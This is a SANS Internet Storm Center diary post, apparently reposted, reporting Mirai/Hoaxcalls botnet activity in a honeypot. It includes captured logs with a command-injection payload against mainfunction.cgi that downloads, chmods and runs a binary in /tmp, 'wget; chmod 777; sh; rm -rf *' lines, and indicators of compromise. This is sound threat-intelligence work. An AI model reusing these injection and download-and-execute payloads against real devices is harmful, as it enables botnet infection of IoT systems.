Archive for June 13th, 2020

Mirai Botnet Activity, (Sat, Jun 13th)

This past week, I noticed new activity from the Mirai botnet in my honeypot. The sample log with the IP and file associated with the first log appears to have been taken down ( which appeared multiple times this week including today. However, the last two logs from today are still active which is using a Bash script to download multiple exploits targeting various device types (MIPS, ARM4-7, MPSL, x86, PPC, M68k). Something else of interest is the User-Agent: XTC and the name viktor which appear to be linked to XTC IRC Botnet, aka Hoaxcalls.

  • 20200613-025717: data ‘POST /cgi-bin/mainfunction.cgi HTTP/1.1rnUser-Agent: XTCrnHost: 189rnAccept-Encoding: gzip, deflaternAccept-Language: en-US,en;q=0.9rnrnaction=login&keyPath=’wget${IFS}${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor’&loginUser=a&loginPwd=arnrn’
  • 20200613-101614: data ‘cd /tmp; wget; chmod 777; sh; rm -rf *rnrn’
  • 20200613-101617: data ‘cd /tmp; wget; chmod 777; sh; rm -rf *rnrn’

Indicators of Compromise

  • http://96.30.193[.]26/arm7
  • http://185.172.111[.]214/8UsA[.]sh
  • User-Agent: XTC

Suspisious Files and Scripts:

  • UnHAnaAW.sh4 – 5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1
  • – 590d00e051703e55be2ad10fa94eadc499262bf8a62190a648a7a2756fd31862


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →